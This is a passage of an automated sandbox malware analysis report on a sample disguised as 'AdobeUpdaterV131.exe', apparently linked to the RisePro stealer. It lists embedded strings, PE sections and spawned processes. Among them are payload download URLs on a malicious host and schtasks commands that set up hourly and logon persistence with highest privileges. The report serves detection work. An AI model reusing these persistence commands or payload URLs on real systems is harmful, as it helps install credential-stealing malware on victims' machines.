            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar)X
            Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarsC:
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
            Source: xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar?Y
            Source: xRp.exe, 0000000F.00000002.2058481763.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarC:
            Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
            Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
            Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
            Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
            Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
            Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
            Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
            Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
            Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWSASendWs2_32.dll
            Source: xRp.exe, 00000001.00000003.1666399765.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: RageMP131.exe, 0000000C.00000002.4131081947.000000000111E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTF/
            Source: MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTFs
            Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
            Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
            Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_77af7215-3

            System Summary

            barindex
            Source: AdobeUpdaterV131.exeStatic PE information: section name:
            Source: AdobeUpdaterV131.exeStatic PE information: section name: .idata
            Source: AdobeUpdaterV131.exeStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: .idata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
            Source: xRp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006220400_2_00622040
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_0068F9800_2_0068F980
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_007031880_2_00703188
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006FFA000_2_006FFA00
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006222C00_2_006222C0
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006F9AB00_2_006F9AB0
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_0062A2900_2_0062A290
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006A0BF00_2_006A0BF0
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_00639BC00_2_00639BC0
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_00708BCF0_2_00708BCF
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_0071C4A10_2_0071C4A1
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_00633D500_2_00633D50
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006AAE600_2_006AAE60
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_0062A6C00_2_0062A6C0
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeCode function: 0_2_006A3ED00_2_006A3ED0
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E60761_2_004E6076
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E6D001_2_004E6D00
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00AB20409_2_00AB2040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B931889_2_00B93188
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B1F9809_2_00B1F980
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B89AB09_2_00B89AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00ABA2909_2_00ABA290
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00AB22C09_2_00AB22C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B8FA009_2_00B8FA00
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B30BF09_2_00B30BF0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00AC9BC09_2_00AC9BC0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B98BCF9_2_00B98BCF
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00BAC4A19_2_00BAC4A1
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00AC3D509_2_00AC3D50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B33ED09_2_00B33ED0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00ABA6C09_2_00ABA6C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 9_2_00B3AE609_2_00B3AE60
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00AB204010_2_00AB2040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B9318810_2_00B93188
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B1F98010_2_00B1F980
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B89AB010_2_00B89AB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00ABA29010_2_00ABA290
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00AB22C010_2_00AB22C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B8FA0010_2_00B8FA00
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B30BF010_2_00B30BF0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00AC9BC010_2_00AC9BC0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B98BCF10_2_00B98BCF
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00BAC4A110_2_00BAC4A1
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00AC3D5010_2_00AC3D50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B33ED010_2_00B33ED0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00ABA6C010_2_00ABA6C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 10_2_00B3AE6010_2_00B3AE60
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005C204012_2_005C2040
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_006A318812_2_006A3188
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_0062F98012_2_0062F980
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_0069FA0012_2_0069FA00
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005C22C012_2_005C22C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005CA29012_2_005CA290
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_00699AB012_2_00699AB0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_00640BF012_2_00640BF0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005D9BC012_2_005D9BC0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_006A8BCF12_2_006A8BCF
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_006BC4A112_2_006BC4A1
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005D3D5012_2_005D3D50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_0064AE6012_2_0064AE60
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_005CA6C012_2_005CA6C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 12_2_00643ED012_2_00643ED0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005C204014_2_005C2040
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_006A318814_2_006A3188
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_0062F98014_2_0062F980
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_0069FA0014_2_0069FA00
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005C22C014_2_005C22C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005CA29014_2_005CA290
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_00699AB014_2_00699AB0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_00640BF014_2_00640BF0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005D9BC014_2_005D9BC0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_006A8BCF14_2_006A8BCF
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_006BC4A114_2_006BC4A1
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005D3D5014_2_005D3D50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_0064AE6014_2_0064AE60
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_005CA6C014_2_005CA6C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 14_2_00643ED014_2_00643ED0
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E3607615_2_00E36076
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E36D0015_2_00E36D00
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xRp.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: String function: 0069CBF0 appears 46 times
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 00B8CBF0 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
            Source: AdobeUpdaterV131.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: MPGPH131.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: RageMP131.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4131681173.0000000001350000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
            Source: AdobeUpdaterV131.exeBinary or memory string: OriginalFilenameheidisql.exe2 vs AdobeUpdaterV131.exe
            Source: AdobeUpdaterV131.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: xRp.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xRp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xRp.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: AdobeUpdaterV131.exeStatic PE information: Section: ZLIB complexity 0.999878358004386
            Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.999878358004386
            Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.999878358004386
            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@27/29@1/2
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 1_2_004E119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_004E119F
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeCode function: 15_2_00E3119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,15_2_00E3119F
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile created: C:\Users\user\AppData\Local\RageMP131Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7248:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6568
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile created: C:\Users\user\AppData\Local\Temp\xRp.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: AdobeUpdaterV131.exe, 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, AdobeUpdaterV131.exe, 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, RageMP131.exe, 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: AdobeUpdaterV131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeFile read: C:\Users\user\Desktop\AdobeUpdaterV131.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\AdobeUpdaterV131.exe "C:\Users\user\Desktop\AdobeUpdaterV131.exe"
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exe
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exeJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\xRp.exe C:\Users\user\AppData\Local\Temp\xRp.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: acgenral.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: winmmbase.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\AdobeUpdaterV131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: acgenral.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\xRp.exeSection loaded: userenv.dllJump to behavior
